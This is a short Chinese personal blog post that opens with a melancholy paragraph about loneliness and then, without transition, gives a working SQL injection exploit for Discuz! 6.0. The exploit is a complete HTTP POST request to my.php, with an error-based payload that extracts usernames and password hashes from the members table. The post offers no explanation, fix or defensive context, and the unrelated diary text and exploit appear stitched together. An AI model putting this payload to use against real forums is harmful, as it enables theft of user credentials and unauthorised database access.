Sh4dow's Blog

活了二十几年,从来没有人给过我一次意外感动或惊喜,也没有人在我生日的时候给过我特别的礼物,生病的时候得到的只是一些不在身边的语言安慰,也不见谁真正的照顾过自己,甚至有的时候自己蒙头睡一觉就好了,也有人喜欢过我,但是从没见谁坚持过。

discuz! 6.0 注入漏洞

注册用户+登陆

POST /upload/my.php?item=buddylist&descriptionnew['+and(select+1+from(select+count(*),concat((select(select+concat(0x7c,username,0x7c,password,0x7c)+from+cdb_members+limit+0,1)+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23]=1 HTTP/1.1

Host: xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:38.0) Gecko/20100101 Firefox/38.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Referer: https://xxx.xxx.xxx/upload/my.php

Cookie: vvy_sid=20TuoM

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 66


formhash=c078b379&newbuddy=1&newdescription=2&buddysubmit=true


评论 ( 1 )

© Sh4dow's Blog | Powered by LOFTER